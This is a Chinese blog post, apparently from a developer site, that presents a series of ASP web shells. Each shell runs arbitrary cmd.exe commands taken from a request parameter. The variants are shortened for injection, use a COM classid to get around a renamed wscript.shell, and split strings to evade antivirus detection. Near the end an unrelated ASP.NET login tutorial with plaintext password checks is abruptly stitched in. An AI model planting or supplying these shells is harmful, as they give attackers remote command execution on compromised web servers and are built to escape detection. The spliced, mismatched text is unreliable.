asp执行cmd实例

第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>



<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>
第8个,asp代码可以加密吗?
当然可以了
以下是一个简单的ASP.NET登录示例: 1. 在Visual Studio中创建一个新的ASP.NET Web应用程序项目。 2. 在项目中添加一个Web表单(.aspx文件)和一个代码文件(.aspx.cs文件)。 3. 在Web表单上添加用户名和密码输入框以及一个登录按钮。 4. 在代码文件中添加以下代码: ``` using System; using System.Data.SqlClient; public partial class Login : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } protected void btnLogin_Click(object sender, EventArgs e) { string username = txtUsername.Text; string password = txtPassword.Text; SqlConnection con = new SqlConnection("Data Source=your_server_name;Initial Catalog=your_database_name;Integrated Security=True"); SqlCommand cmd = new SqlCommand("SELECT COUNT(*) FROM Users WHERE Username=@username AND Password=@password", con); cmd.Parameters.AddWithValue("@username", username); cmd.Parameters.AddWithValue("@password", password); con.Open(); int count = (int)cmd.ExecuteScalar(); con.Close(); if (count > 0) { Response.Redirect("Home.aspx"); } else { lblError.Text = "Invalid username or password"; } } } ``` 5. 将服务器名称和数据库名称替换为您自己的服务器和数据库名称。 6. 运行应用程序并测试登录功能。 该示例使用了一个简单的数据库表(Users),其中包含用户名和密码字段。在登录按钮上点击时,代码将从数据库中检索相应的用户名和密码,并将其与用户输入进行比较。如果匹配,则用户将被重定向到主页。否则,将显示错误消息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值